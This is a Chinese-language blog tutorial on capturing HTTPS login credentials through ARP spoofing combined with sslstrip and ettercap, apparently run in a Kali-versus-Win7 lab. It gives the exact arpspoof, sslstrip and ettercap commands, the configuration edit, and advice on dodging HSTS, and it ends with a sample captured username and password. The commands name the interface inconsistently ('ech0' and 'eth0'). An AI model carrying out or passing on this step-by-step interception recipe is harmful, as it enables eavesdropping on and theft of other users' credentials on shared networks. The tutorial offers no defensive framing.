ARP欺骗攻击利用之抓取https协议的用户名与密码

1.首先安装sslstrip

命令执行:apt-get install sslstrip

2.启动arp欺骗

arpspoof -i ech0 -t 192.168.159.148 192.168.159.2

arpspoof -i ech0(网卡) -t 目标机ip 本地局域网关

3.命令行输入: vim /etc/ettercap/etter.conf进入配置文件

找到下红框的内容,输入字母i进入编辑模式,把#注释符去掉,按键盘右上角ESC键退出编辑模式,进入命令行模式,同时按住shift键与冒号键:然后输入wq进行保存并退出。

4.另外再启动第二kali终端,输入下面命令

命令执行:sslstrip -a -f --k

sslstrip是一个命令行工具,用于将HTTPS连接转换为HTTP连接,以便进行中间人攻击。其中

-a选项表示将所有请求重定向到攻击者控制的设备上

-f选项表示强制使用HTTP而不是HTTPS

-k选项表示忽略证书错误。

因此,这个命令的作用是在中间人攻击中使用sslstrip工具将HTTPS连接转换为HTTP连接,并将所有请求重定向到攻击者控制的设备上,同时忽略证书错误。

5.另起第三个kali终端输入:ettercap -Tq -i eth0

-T:启动文本模式 q:安静模式 -i:攻击机网卡

6.Win7访问https协议网站后台

注意:使用google浏览器 ,不要使用用IE浏览器(默认开启了HSTS(HTTP Strict Transport Security--HTTP严格传输安全)功能,该功能会强制浏览器只能通过HTTPS协议访问原本就是HTTPS协议编写的网站)

7.进入登入后台,随机输入账号密码

8. 回到kali虚拟机,查看ettercap工具的抓取结果

最后抓到账号和密码:[email protected] 123456

相关推荐
忆往夕梦34 分钟前
开放最短路径优先 - OSPF【LSA详细】
网络·智能路由器
zhu12893035561 小时前
网络安全防护与挑战
网络·安全·web安全
榆榆欸1 小时前
14.主从Reactor+线程池模式,Connection对象引用计数的深入分析
linux·服务器·网络·c++·tcp/ip
cuijiecheng20181 小时前
音视频入门基础:RTP专题(21)——使用Wireshark分析海康网络摄像机RTSP的RTP流
网络·wireshark·音视频
JavaEdge.2 小时前
ssl.SSLCertVerificationError报错解决方案
网络·网络协议·ssl
kfepiza2 小时前
`accept_ra` 和 `autoconf` 和 `forwarding` 的关系 笔记250404
linux·网络·笔记·tcp/ip·智能路由器·ip·tcp
小宁爱Python4 小时前
Python从入门到精通4:计算机网络及TCP网络应用程序开发入门指南
网络·python·tcp/ip·计算机网络
发财哥fdy4 小时前
4.2-3 fiddler抓取手机接口
网络
网络安全指导员6 小时前
如何在JMeter中配置断言,将非200状态码视为测试成功
网络·学习·jmeter·安全·web安全·架构
~樱小路~6 小时前
网络:华为数通HCIA学习:IP路由基础
网络·学习·华为